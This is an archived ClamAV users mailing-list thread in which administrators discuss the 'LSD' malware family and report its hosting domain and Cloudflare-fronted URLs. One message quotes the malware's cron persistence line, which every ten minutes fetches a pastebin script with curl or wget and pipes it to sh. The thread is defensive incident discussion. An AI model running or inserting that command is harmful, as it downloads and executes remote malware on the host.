[clamav-users] LSD Malwares
Joel Esler (jesler)
jesler at cisco.com
Mon Apr 29 13:33:13 UTC 2019
Thank you for writing in.
Go to this URL to change user options or unsubscribe:
https://lists.Clamav.net/mailman/listinfo/Clamav-users
or by sending an email to Clamav-users-leave at lists.Clamav.net<mailto:Clamav-users-leave at lists.Clamav.net>
Thanks!
-- Joel Esler Manager, Communities Division Cisco Talos Intelligence Group http://www.talosintelligence.com
On Apr 26, 2019, at 1:35 PM, Vicstardust via clamav-users <clamav-users at lists.clamav.net<mailto:clamav-users at lists.clamav.net>> wrote:
Pls check my Previous EMAIL "UNSUBSCRIBE ME...ETC", just sent.
TXS
Have a nice Weekend!
Obter o BlueMail para Android<http://www.bluemail.me/r?b=14726>
Em 26/04/2019, em 04:26, Xavier Maysonnave via clamav-users <clamav-users at lists.clamav.net<mailto:clamav-users at lists.clamav.net>> escreveu:
Hi All,
Thanks for your feedback.
I'm going to report to Cloudflare this URL.
However keep in mind that there are other URLs who are involved in this family.
*/10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget<https://pastebin.com/raw/wR3ETdbi%7C%7Cwget> -q -O- https://pastebin.com/raw/wR3ETdbi)|sh<https://pastebin.com/raw/wR3ETdbi)%7Csh>
This one targets Jenkins, another popular OpenSource tool, not used on our infrastructure though.
I'm still very interested with the consequences of this malwares. Any hints will be greatly appreciated.
Thanks.
Light
Pudhuveedu / Xavier
PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
Le ven. 26 avr. 2019 à 08:03, Dave Warren via clamav-users <clamav-users at lists.clamav.net<mailto:clamav-users at lists.clamav.net>> a écrit :
The same applies: Report it. Cloudflare will either forward the
complaint for you, or block the offending URL (or both).
On 2019-04-25 19:16, Dennis Peterson wrote:
> That domain is hosted on a cloudflare IP block. They're become part of
> the problem.
>
> dp
>
> On 4/25/19 7:52 AM, J.R. via clamav-users wrote:
>> Perhaps it would also be worthwhile to report dd.heheda.tk<http://dd.heheda.tk/> to their
>> hosting provider & domain registrar that they are hosting malware and
>> get that site shut down...
>>
_______________________________________________
clamav-users mailing list
clamav-users at lists.clamav.net<mailto:clamav-users at lists.clamav.net>
https://lists.clamav.net/mailman/listinfo/clamav-users
Help us build a comprehensive ClamAV guide:
https://github.com/vrtadmin/clamav-faq
http://www.clamav.net/contact.html#ml
________________________________
clamav-users mailing list
clamav-users at lists.clamav.net<mailto:clamav-users at lists.clamav.net>
https://lists.clamav.net/mailman/listinfo/clamav-users
Help us build a comprehensive ClamAV guide:
https://github.com/vrtadmin/clamav-faq
http://www.clamav.net/contact.html#ml
_______________________________________________
clamav-users mailing list
clamav-users at lists.clamav.net<mailto:clamav-users at lists.clamav.net>
https://lists.clamav.net/mailman/listinfo/clamav-users
Help us build a comprehensive ClamAV guide:
https://github.com/vrtadmin/clamav-faq
http://www.clamav.net/contact.html#ml
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.clamav.net/pipermail/clamav-users/attachments/20190429/dd1a318f/attachment.htm>
More information about the clamav-users
mailing list